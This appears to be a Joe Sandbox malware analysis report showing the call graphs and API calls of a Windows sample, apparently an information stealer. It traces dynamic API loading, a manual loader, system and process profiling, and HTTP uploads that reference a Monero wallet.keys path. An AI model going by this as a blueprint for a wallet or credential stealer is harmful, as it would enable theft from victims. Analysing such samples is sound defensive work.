15454 628d20 LocalAlloc CharToOemW 15335->15454 15338 62a740 lstrcpy 15337->15338 15339 627bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15338->15339 15346 627c25 15339->15346 15340 627c46 GetLocaleInfoA 15340->15346 15341 627d18 15342 627d28 15341->15342 15343 627d1e LocalFree 15341->15343 15345 62a7a0 lstrcpy 15342->15345 15343->15342 15344 62a9b0 lstrcpy lstrlen lstrcpy lstrcat 15344->15346 15348 627d37 15345->15348 15346->15340 15346->15341 15346->15344 15347 62a8a0 lstrcpy 15346->15347 15347->15346 15348->14713 15350 622008 15349->15350 15350->14728 15352 629493 GetModuleFileNameExA CloseHandle 15351->15352 15353 6294b5 15351->15353 15352->15353 15354 62a740 lstrcpy 15353->15354 15355 622091 15354->15355 15355->14743 15357 622119 15356->15357 15358 627e68 RegQueryValueExA 15356->15358 15357->14757 15359 627e8e RegCloseKey 15358->15359 15359->15357 15361 627fb9 GetLogicalProcessorInformationEx 15360->15361 15362 627fd8 GetLastError 15361->15362 15363 628029 15361->15363 15364 628022 15362->15364 15372 627fe3 15362->15372 15369 6289f0 2 API calls 15363->15369 15367 6289f0 2 API calls 15364->15367 15368 622194 15364->15368 15367->15368 15368->14771 15370 62807b 15369->15370 15370->15364 15371 628084 wsprintfA 15370->15371 15371->15368 15372->15361 15372->15368 15455 6289f0 15372->15455 15458 628a10 GetProcessHeap RtlAllocateHeap 15372->15458 15374 62220f 15373->15374 15374->14785 15376 6289b0 15375->15376 15377 62814d GlobalMemoryStatusEx 15376->15377 15380 628163 __aulldiv 15377->15380 15378 62819b wsprintfA 15379 622289 15378->15379 15379->14799 15380->15378 15382 6287fb GetProcessHeap RtlAllocateHeap wsprintfA 15381->15382 15384 62a740 lstrcpy 15382->15384 15385 62230b 15384->15385 15385->14813 15387 62a740 lstrcpy 15386->15387 15393 628229 15387->15393 15388 628263 15389 62a7a0 lstrcpy 15388->15389 15391 6282dc 15389->15391 15390 62a9b0 lstrcpy lstrlen lstrcpy lstrcat 15390->15393 15391->14830 15392 62a8a0 lstrcpy 15392->15393 15393->15388 
15393->15390 15393->15392 15395 62a740 lstrcpy 15394->15395 15396 62835c RegOpenKeyExA 15395->15396 15397 6283d0 15396->15397 15398 6283ae 15396->15398 15400 628613 RegCloseKey 15397->15400 15401 6283f8 RegEnumKeyExA 15397->15401 15399 62a7a0 lstrcpy 15398->15399 15411 6283bd 15399->15411 15404 62a7a0 lstrcpy 15400->15404 15402 62860e 15401->15402 15403 62843f wsprintfA RegOpenKeyExA 15401->15403 15402->15400 15405 6284c1 RegQueryValueExA 15403->15405 15406 628485 RegCloseKey RegCloseKey 15403->15406 15404->15411 15407 628601 RegCloseKey 15405->15407 15408 6284fa lstrlen 15405->15408 15409 62a7a0 lstrcpy 15406->15409 15407->15402 15408->15407 15410 628510 15408->15410 15409->15411 15412 62a9b0 4 API calls 15410->15412 15411->14856 15413 628527 15412->15413 15414 62a8a0 lstrcpy 15413->15414 15415 628533 15414->15415 15416 62a9b0 4 API calls 15415->15416 15417 628557 15416->15417 15418 62a8a0 lstrcpy 15417->15418 15419 628563 15418->15419 15420 62856e RegQueryValueExA 15419->15420 15420->15407 15421 6285a3 15420->15421 15422 62a9b0 4 API calls 15421->15422 15423 6285ba 15422->15423 15424 62a8a0 lstrcpy 15423->15424 15425 6285c6 15424->15425 15426 62a9b0 4 API calls 15425->15426 15427 6285ea 15426->15427 15428 62a8a0 lstrcpy 15427->15428 15429 6285f6 15428->15429 15429->15407 15431 62a740 lstrcpy 15430->15431 15432 6286bc CreateToolhelp32Snapshot Process32First 15431->15432 15433 6286e8 Process32Next 15432->15433 15434 62875d CloseHandle 15432->15434 15433->15434 15436 6286fd 15433->15436 15435 62a7a0 lstrcpy 15434->15435 15437 628776 15435->15437 15436->15433 15438 62a8a0 lstrcpy 15436->15438 15439 62a9b0 lstrcpy lstrlen lstrcpy lstrcat 15436->15439 15437->14888 15438->15436 15439->15436 15441 62a7a0 lstrcpy 15440->15441 15442 6251b5 15441->15442 15443 611590 lstrcpy 15442->15443 15444 6251c6 15443->15444 15459 615100 15444->15459 15446 6251cf 15446->14900 15450 627720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15447->15450 15449 6276b9 15449->15322 15449->15323 
15451 627780 RegCloseKey 15450->15451 15452 627765 RegQueryValueExA 15450->15452 15453 627793 15451->15453 15452->15451 15453->15449 15454->15334 15456 6289f9 GetProcessHeap HeapFree 15455->15456 15457 628a0c 15455->15457 15456->15457 15457->15372 15458->15372 15460 62a7a0 lstrcpy 15459->15460 15461 615119 15460->15461 15462 6147b0 2 API calls 15461->15462 15463 615125 15462->15463 15619 628ea0 15463->15619 15465 615184 15466 615192 lstrlen 15465->15466 15467 6151a5 15466->15467 15468 628ea0 4 API calls 15467->15468 15469 6151b6 15468->15469 15470 62a740 lstrcpy 15469->15470 15471 6151c9 15470->15471 15472 62a740 lstrcpy 15471->15472 15473 6151d6 15472->15473 15474 62a740 lstrcpy 15473->15474 15475 6151e3 15474->15475 15476 62a740 lstrcpy 15475->15476 15477 6151f0 15476->15477 15478 62a740 lstrcpy 15477->15478 15479 6151fd InternetOpenA StrCmpCA 15478->15479 15480 61522f 15479->15480 15481 6158c4 InternetCloseHandle 15480->15481 15482 628b60 3 API calls 15480->15482 15488 6158d9 codecvt 15481->15488 15483 61524e 15482->15483 15484 62a920 3 API calls 15483->15484 15485 615261 15484->15485 15486 62a8a0 lstrcpy 15485->15486 15487 61526a 15486->15487 15489 62a9b0 4 API calls 15487->15489 15492 62a7a0 lstrcpy 15488->15492 15490 6152ab 15489->15490 15491 62a920 3 API calls 15490->15491 15493 6152b2 15491->15493 15500 615913 15492->15500 15494 62a9b0 4 API calls 15493->15494 15495 6152b9 15494->15495 15496 62a8a0 lstrcpy 15495->15496 15497 6152c2 15496->15497 15498 62a9b0 4 API calls 15497->15498 15499 615303 15498->15499 15501 62a920 3 API calls 15499->15501 15500->15446 15502 61530a 15501->15502 15503 62a8a0 lstrcpy 15502->15503 15504 615313 15503->15504 15505 615329 InternetConnectA 15504->15505 15505->15481 15506 615359 HttpOpenRequestA 15505->15506 15508 6158b7 InternetCloseHandle 15506->15508 15509 6153b7 15506->15509 15508->15481 15510 62a9b0 4 API calls 15509->15510 15511 6153cb 15510->15511 15512 62a8a0 lstrcpy 15511->15512 15513 6153d4 15512->15513 15514 62a920 
3 API calls 15513->15514 15515 6153f2 15514->15515 15516 62a8a0 lstrcpy 15515->15516 15517 6153fb 15516->15517 15518 62a9b0 4 API calls 15517->15518 15519 61541a 15518->15519 15520 62a8a0 lstrcpy 15519->15520 15521 615423 15520->15521 15522 62a9b0 4 API calls 15521->15522 15523 615444 15522->15523 15524 62a8a0 lstrcpy 15523->15524 15525 61544d 15524->15525 15526 62a9b0 4 API calls 15525->15526 15527 61546e 15526->15527 15528 62a8a0 lstrcpy 15527->15528 15620 628ead CryptBinaryToStringA 15619->15620 15621 628ea9 15619->15621 15620->15621 15622 628ece GetProcessHeap RtlAllocateHeap 15620->15622 15621->15465 15622->15621 15623 628ef4 codecvt 15622->15623 15624 628f05 CryptBinaryToStringA 15623->15624 15624->15621 15628->14903 15871 619880 15629->15871 15631 6198e1 15631->14910 15633 62a740 lstrcpy 15632->15633 15634 61fb16 15633->15634 15909 628de0 15634->15909 15806 62a740 lstrcpy 15805->15806 15807 620266 15806->15807 15808 628de0 2 API calls 15807->15808 15809 62027b 15808->15809 15810 62a920 3 API calls 15809->15810 15811 62028b 15810->15811 15812 62a8a0 lstrcpy 15811->15812 15813 620294 15812->15813 15814 62a9b0 4 API calls 15813->15814 15815 6202b8 15814->15815 15872 61988e 15871->15872 15875 616fb0 15872->15875 15874 6198ad codecvt 15874->15631 15878 616d40 15875->15878 15879 616d59 15878->15879 15880 616d63 15878->15880 15879->15874 15880->15879 15892 616660 15880->15892 15882 616dbe 15882->15879 15898 6169b0 15882->15898 15884 616e2a 15884->15879 15885 616ef7 15884->15885 15886 616ee6 VirtualFree 15884->15886 15887 616f26 FreeLibrary 15885->15887 15888 616f38 15885->15888 15891 616f41 15885->15891 15886->15885 15887->15885 15890 6289f0 2 API calls 15888->15890 15889 6289f0 2 API calls 15889->15879 15890->15891 15891->15879 15891->15889 15895 61668f VirtualAlloc 15892->15895 15894 616730 15896 616743 VirtualAlloc 15894->15896 15897 61673c 15894->15897 15895->15894 15895->15897 15896->15897 15897->15882 15899 6169c9 15898->15899 15904 6169d5 15898->15904 15900 
616a09 LoadLibraryA 15899->15900 15899->15904 15901 616a32 15900->15901 15900->15904 15902 616ae0 15901->15902 15908 628a10 GetProcessHeap RtlAllocateHeap 15901->15908 15902->15904 15906 616ba8 GetProcAddress 15902->15906 15904->15884 15905 616a8b 15905->15904 15907 6289f0 2 API calls 15905->15907 15906->15902 15906->15904 15907->15902 15908->15905

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 629860-629874 call 629750 663 629a93-629af2 LoadLibraryA * 5 660->663 664 62987a-629a8e call 629780 GetProcAddress * 21 660->664 666 629af4-629b08 GetProcAddress 663->666 667 629b0d-629b14 663->667 664->663 666->667 668 629b46-629b4d 667->668 669 629b16-629b41 GetProcAddress * 2 667->669 671 629b68-629b6f 668->671 672 629b4f-629b63 GetProcAddress 668->672 669->668 673 629b71-629b84 GetProcAddress 671->673 674 629b89-629b90 671->674 672->671 673->674 675 629b92-629bbc GetProcAddress * 2 674->675 676 629bc1-629bc2 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01112320), ref: 006298A1
                          • GetProcAddress.KERNEL32(74DD0000,01112338), ref: 006298BA
                          • GetProcAddress.KERNEL32(74DD0000,01112350), ref: 006298D2
                          • GetProcAddress.KERNEL32(74DD0000,01112380), ref: 006298EA
                          • GetProcAddress.KERNEL32(74DD0000,01112428), ref: 00629903
                          • GetProcAddress.KERNEL32(74DD0000,01118F48), ref: 0062991B
                          • GetProcAddress.KERNEL32(74DD0000,01105750), ref: 00629933
                          • GetProcAddress.KERNEL32(74DD0000,01105810), ref: 0062994C
                          • GetProcAddress.KERNEL32(74DD0000,011123C8), ref: 00629964
                          • GetProcAddress.KERNEL32(74DD0000,01112368), ref: 0062997C
                          • GetProcAddress.KERNEL32(74DD0000,011123E0), ref: 00629995
                          • GetProcAddress.KERNEL32(74DD0000,011123F8), ref: 006299AD
                          • GetProcAddress.KERNEL32(74DD0000,01105930), ref: 006299C5
                          • GetProcAddress.KERNEL32(74DD0000,01112410), ref: 006299DE
                          • GetProcAddress.KERNEL32(74DD0000,011124B8), ref: 006299F6
                          • GetProcAddress.KERNEL32(74DD0000,01105730), ref: 00629A0E
                          • GetProcAddress.KERNEL32(74DD0000,011124E8), ref: 00629A27
                          • GetProcAddress.KERNEL32(74DD0000,01112500), ref: 00629A3F
                          • GetProcAddress.KERNEL32(74DD0000,01105A50), ref: 00629A57
                          • GetProcAddress.KERNEL32(74DD0000,01112218), ref: 00629A70
                          • GetProcAddress.KERNEL32(74DD0000,01105A90), ref: 00629A88
                          • LoadLibraryA.KERNEL32(01112578,?,00626A00), ref: 00629A9A
                          • LoadLibraryA.KERNEL32(01112530,?,00626A00), ref: 00629AAB
                          • LoadLibraryA.KERNEL32(01112548,?,00626A00), ref: 00629ABD
                          • LoadLibraryA.KERNEL32(01112518,?,00626A00), ref: 00629ACF
                          • LoadLibraryA.KERNEL32(01112560,?,00626A00), ref: 00629AE0
                          • GetProcAddress.KERNEL32(75A70000,01112590), ref: 00629B02
                          • GetProcAddress.KERNEL32(75290000,011125A8), ref: 00629B23
                          • GetProcAddress.KERNEL32(75290000,011125C0), ref: 00629B3B
                          • GetProcAddress.KERNEL32(75BD0000,011125D8), ref: 00629B5D
                          • GetProcAddress.KERNEL32(75450000,01105830), ref: 00629B7E
                          • GetProcAddress.KERNEL32(76E90000,011190D8), ref: 00629B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00629BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00629BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: a44feadb90cc505beede032d129dc9084d021e2142801c4348d2013099980228
                          • Instruction ID: 0ee67c7b95884f27bd92ace295ffc75e8cc3b00db52c54b65b6ea23296e5b7b7
                          • Opcode Fuzzy Hash: a44feadb90cc505beede032d129dc9084d021e2142801c4348d2013099980228
                          • Instruction Fuzzy Hash: 39A108B5510344AFD74CEFA8EDD8A663BF9F78C303714872AA64583264D63DA841CF62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 6145c0-614695 RtlAllocateHeap 781 6146a0-6146a6 764->781 782 6146ac-61474a 781->782 783 61474f-6147a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0061460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0061479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614765
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was 
founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 01c46b4adba50ab7e0f71131175deb3fc65acaf370711d5d587f73e3dcc99e81
                          • Instruction ID: c7f96c518c49d94672e25481ba516083bb3aaeb241560f1a2798b90a4f902921
                          • Opcode Fuzzy Hash: 01c46b4adba50ab7e0f71131175deb3fc65acaf370711d5d587f73e3dcc99e81
                          • Instruction Fuzzy Hash: D94141607E36047AF678BBA4AA6EFDD73679F72B04F917064E802532C0CBB0750045A6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 614880-614942 call 62a7a0 call 6147b0 call 62a740 * 5 InternetOpenA StrCmpCA 816 614944 801->816 817 61494b-61494f 801->817 816->817 818 614955-614acd call 628b60 call 62a920 call 62a8a0 call 62a800 * 2 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a920 call 62a8a0 call 62a800 * 2 InternetConnectA 817->818 819 614ecb-614ef3 InternetCloseHandle call 62aad0 call 619ac0 817->819 818->819 905 614ad3-614ad7 818->905 829 614f32-614fa2 call 628990 * 2 call 62a7a0 call 62a800 * 8 819->829 830 614ef5-614f2d call 62a820 call 62a9b0 call 62a8a0 call 62a800 819->830 830->829 906 614ae5 905->906 907 614ad9-614ae3 905->907 908 614aef-614b22 HttpOpenRequestA 906->908 907->908 909 614b28-614e28 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a740 call 62a920 * 2 call 62a8a0 call 62a800 * 2 call 62aad0 lstrlen call 62aad0 * 2 lstrlen call 62aad0 HttpSendRequestA 908->909 910 614ebe-614ec5 InternetCloseHandle 908->910 1021 614e32-614e5c InternetReadFile 909->1021 910->819 1022 614e67-614eb9 InternetCloseHandle call 62a800 1021->1022 1023 614e5e-614e65 1021->1023 1022->910 1023->1022 1024 614e69-614ea7 call 62a9b0 call 62a8a0 call 62a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00614915
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 0061493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00614ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00630DDB,00000000,?,?,00000000,?,",00000000,?,0111E848), ref: 00614DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00614E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00614E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00614E49
                          • InternetCloseHandle.WININET(00000000), ref: 00614EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00614EC5
                          • HttpOpenRequestA.WININET(00000000,0111E898,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00614B15
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • InternetCloseHandle.WININET(00000000), ref: 00614ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
